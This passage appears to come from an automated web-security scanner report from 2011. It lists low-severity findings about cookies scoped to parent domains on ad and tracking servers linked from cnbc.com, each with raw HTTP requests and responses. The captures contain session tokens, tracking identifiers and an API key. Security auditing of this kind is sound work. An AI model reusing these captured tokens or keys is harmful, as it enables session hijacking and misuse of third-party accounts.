GET /images/cc/cc.gif?ver=1.0&aID=9684550200&mkt=0&ref=http%3A//www.rayalab.com/%3Fgclid%3DCMuoq_OIiasCFRligwodfwxd4w HTTP/1.1 Host: convctr.overture.com Proxy-Connection: keep-alive Referer: http://www.rayalab.com/free_sample.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxMLAycAc8BMqgw=
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:46:44 GMT Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29Set-Cookie: SessionData=02u3hs9yoaT4tKLixNTUk1sQEAY0NjI0c3cyNTU7Vj1ODi4vzMoDwuQUbORgamZuYWRoZupuYmAI4hjA4O; domain=.overture.com; path=/; expires=Tue, 06-Sep-2011 16:51:44 GMT P3P: CP=" NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR STP IND UNI COM NAV INT STA " Pragma: no-cache Connection: close Content-Type: image/gif Content-Length: 34 GIF89a.............,...........L.;
12.3. http://pg.links.origin.channelintelligence.com/pages/wl.asp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://pg.links.origin.channelintelligence.com
Path:
/pages/wl.asp
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:sessionstamp=21967169; expires=Tue, 06-Sep-2011 17:45:36 GMT; domain=.channelintelligence.com; path=/ serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/wl.asp?nCTID=0&nSCID=0&nIID=30314234&nICnt=1&nDCnt=10&nRGID=1964&sPCode=&nStoreID=0&nVStoreID=0&sModelNumber=047400098961&sCCode=US&nRadius=15&nColID=0&nOppCnt=0&sRL=841291_24552604_11302_48968727_13017277_2271669_64856419_13016956_48968727_26080384_8679155&nRID=0&sRnd=B96Gjac1 HTTP/1.1 Host: pg.links.origin.channelintelligence.com Proxy-Connection: keep-alive Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=00047400302457 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Object moved Date: Tue, 06 Sep 2011 16:45:36 GMT Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" X-Powered-By: ASP.NET pragma: no-cache Location: http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=30314234&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D30314234%26nICnt%3D1%26nDCnt%3D10%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098961%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D841291%5F24552604%5F11302%5F48968727%5F13017277%5F2271669%5F64856419%5F13016956%5F48968727%5F26080384%5F8679155%26nRID%3D0%26sRnd%3DB96Gjac1 Content-Length: 716 Content-Type: image/gif Expires: Tue, 06 Sep 2011 16:44:36 GMTSet-Cookie: sessionstamp=21967169; expires=Tue, 06-Sep-2011 17:45:36 GMT; domain=.channelintelligence.com; path=/ Set-Cookie: serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/ Set-Cookie: ASPSESSIONIDQSSATADQ=MHDNEIADOCGBNAAMMCKHGJDD; path=/ Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=30314234&rg...[SNIP]...
12.4. http://pixel.everesttech.net/1688/i
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://pixel.everesttech.net
Path:
/1688/i
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:everest_session_v2=ts5OZjd7UQcAAI3@; path=/; domain=.everesttech.net everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Wed, 11-Sep-2030 01:48:44 GMT The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1688/i?ev_sid=58&ev_ci=700032768&ev_ai=700644175&ev_cri=705923885&ev_pl HTTP/1.1 Host: pixel.everesttech.net Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: gglck=zqROZUBXyFQAAIdR; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:08:44 GMT Server: ApacheSet-Cookie: everest_session_v2=ts5OZjd7UQcAAI3@; path=/; domain=.everesttech.net Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Wed, 11-Sep-2030 01:48:44 GMT P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM" Cache-Control: no-cache Vary: X-EF-Forwarded-For,Cookie,Host Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT ETag: "2051142-80-49f19eb07d340" Accept-Ranges: bytes Content-Length: 128 Content-Type: image/png .PNG . ...IHDR.....................bKGD............. pHYs...........~.....tIME......).......IDATx.c````........E@....IEND.B`.
12.5. http://ttwbs.channelintelligence.com/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://ttwbs.channelintelligence.com
Path:
/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:sessionstamp=5F0620DE-F4C8-E4AD-F1CC-A22673796C99;Domain=.channelintelligence.com;Expires=Tue, 06-Sep-11 17:45:37 GMT The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?eid=203&oid=19483251&linkid=&uid=163810295&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D163810295%26nICnt%3D1%26nDCnt%3D8%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098978%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D13017277%5F841291%5F8679155%5F13016956%5F48968727%5F11302%5F86109971%5F26080384%26nRID%3D0%26sRnd%3DB96GjZc1 HTTP/1.1 Host: ttwbs.channelintelligence.com Proxy-Connection: keep-alive Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: serverstamp=951ED21A%2D5742%2D4191%2DBC56%2D8856DB199D2C
Response
HTTP/1.1 302 Found Date: Tue, 06 Sep 2011 16:45:37 GMT Server: Jetty(6.1.22) Expires: Thu, 01 Jan 1970 00:00:00 GMTSet-Cookie: sessionstamp=5F0620DE-F4C8-E4AD-F1CC-A22673796C99;Domain=.channelintelligence.com;Expires=Tue, 06-Sep-11 17:45:37 GMT Cache-Control: private Content-Length: 0 Location: http://content.links.channelintelligence.com/images/blank.gif?y=0 Via: 1.1 iad061102000000 (MII-APC/2.1) Content-Type: text/plain
12.6. http://a.tribalfusion.com/displayAd.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://a.tribalfusion.com
Path:
/displayAd.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:02 GMT; The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /displayAd.js?dver=0.4&th=37103964303 HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=OptOut
Response
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 153 X-Reuse-Index: 1 Date: Tue, 06 Sep 2011 14:59:02 GMT Last-Modified: Sat, 20 Aug 2011 07:25:15 GMT Expires: Mon, 05 Dec 2011 14:59:02 GMTSet-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:02 GMT; Cache-Control: private Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 247 Connection: keep-alive var e9Manager; var e9; if (e9 !== undefined) { if (e9.displayAdFlag !== undefined) { if (e9.displayAdFlag === true) e9.displayAd(); } else e9Manager.displayAdFromE9(e9)...[SNIP]...
12.7. http://a.tribalfusion.com/i.cid
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://a.tribalfusion.com
Path:
/i.cid
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:45 GMT; The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /i.cid?c=271753&d=30&page=landingPage HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1917245;type=cscro065;cat=cscho154;ord=4762175416108.221? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=OptOut
Response
HTTP/1.1 302 Moved Temporarily P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 206 X-Reuse-Index: 1 Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: privateSet-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:45 GMT; Content-Type: text/html Location: /z/i.cid?c=271753&d=30&page=landingPage Content-Length: 36 Connection: keep-alive <h1>Error 302 Moved Temporarily</h1>
12.8. http://a.tribalfusion.com/j.ad
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://a.tribalfusion.com
Path:
/j.ad
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:04 GMT; The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /j.ad?site=cnbc&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=300x250&flashVer=10&ver=1.21¢er=1&url=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude&f=1&p=19075868&a=1&rnd=19083097 HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=OptOut
Response
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 101 X-Reuse-Index: 1 Pragma: no-cache Cache-Control: private, no-cache, no-store, proxy-revalidateSet-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:04 GMT; Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 267 Expires: 0 Connection: keep-alive document.write('<iframe src="http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250" width=300 height=250 marginwidth=0 marginh...[SNIP]...
12.9. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://a.tribalfusion.com
Path:
/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:05 GMT; The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=OptOut
Response
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 102 X-Reuse-Index: 1 Pragma: no-cache Cache-Control: private, no-cache, no-store, proxy-revalidateSet-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:05 GMT; Content-Type: text/html Vary: Accept-Encoding Content-Length: 191 Expires: 0 Connection: keep-alive <script type="text/javascript" language="JavaScript"> var img = new Image(); img.src = "http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-tribalfusion&cg=&cc=1&rnd=1228001246"; </script>
12.10. http://a.tribalfusion.com/z/i.cid
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://a.tribalfusion.com
Path:
/z/i.cid
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:46 GMT; The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /z/i.cid?c=271753&d=30&page=landingPage HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1917245;type=cscro065;cat=cscho154;ord=4762175416108.221? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=OptOut
Response
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 307 Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: privateSet-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:46 GMT; Content-Type: image/gif Content-Length: 43 Connection: keep-alive GIF89a.............!.......,........@..D..;
12.11. http://ads.pointroll.com/PortalServe/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ads.pointroll.com
Path:
/PortalServe/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;; The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /PortalServe/?pid=1398295G52620110830164853&pub=IC13501&flash=10&time=2|14:57|-5&redir=http://a1.interclick.com/icaid/192677/tid/1ff795b7-a8cc-487d-bdd1-056be6aa440f/click.ic?$CTURL$&pos=x&dom=http://search.cnbc.com&r=0.07496926933526993 HTTP/1.1 Host: ads.pointroll.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=47AC0400-3F06-2A6D-020A-1BB000220100; PRca=|AKln*9320:2|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKlnAC0U:2|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FrlJ:2|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GW7X:2|GV2B:1|GV12:2|GSur:3|#; PRpc=|FrlJGW7X:2|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 06 Sep 2011 14:57:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Cache-Control: no-cache Content-type: text/html Content-length: 4496Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;; Set-Cookie:PRimp=47AC0400-C30A-57B3-020A-1BB000220100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; Set-Cookie:PRca=|AKln*9320:4|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; Set-Cookie:PRcp=|AKlnAC0U:4|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; Set-Cookie:PRpl=|FrlJ:4|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; Set-Cookie:PRcr=|GW7X:4|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; Set-Cookie:PRpc=|FrlJGW7X:4|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef...[SNIP]...
12.12. http://api.bizographics.com/v1/profile.redirect
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://api.bizographics.com
Path:
/v1/profile.redirect
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KV1QisJqhCw3Caj5XcunNcMDa7Re6IGD4lAPKWdnq4jBRAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtS8UYaNROq1hKa5pT7PlEtIEVUJBxdqAyA9AgipxBis0MPBYw4RisMnVT081fJFlZ0k4MipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315321124004408%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1 Host: api.bizographics.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Date: Tue, 06 Sep 2011 15:00:30 GMT Location: http://rt.legolas-media.com/lgrt?ci=1&ei=21&ti=95&vi=11&sti=28&sei=0&sci=0&sai=0&smi=0&pbi=0&sts=1315321124004408&sui=fb069b82-5953-4473-8ae5-0a80415bcdc8&industry=business_services&location=texas P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KV1QisJqhCw3Caj5XcunNcMDa7Re6IGD4lAPKWdnq4jBRAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtS8UYaNROq1hKa5pT7PlEtIEVUJBxdqAyA9AgipxBis0MPBYw4RisMnVT081fJFlZ0k4MipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 X-Bizo-Usage: 1 Content-Length: 0 Connection: keep-alive
12.13. http://b.scorecardresearch.com/b
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/b
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 05-Sep-2013 14:56:57 GMT; path=/; domain=.scorecardresearch.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=2&c2=1000004&c3=&c4=&c5=&c6=&c10=&c15=&c16=&r=&ns__t=1315339017162&ns_c=UTF-8&c8=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&c7=http%3A%2F%2Fwww.cnbc.com%2F&c9=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D(The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM)%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Tue, 06 Sep 2011 14:56:57 GMT Connection: closeSet-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 05-Sep-2013 14:56:57 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
12.14. http://c.statcounter.com/t.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://c.statcounter.com
Path:
/t.php
Issue detail
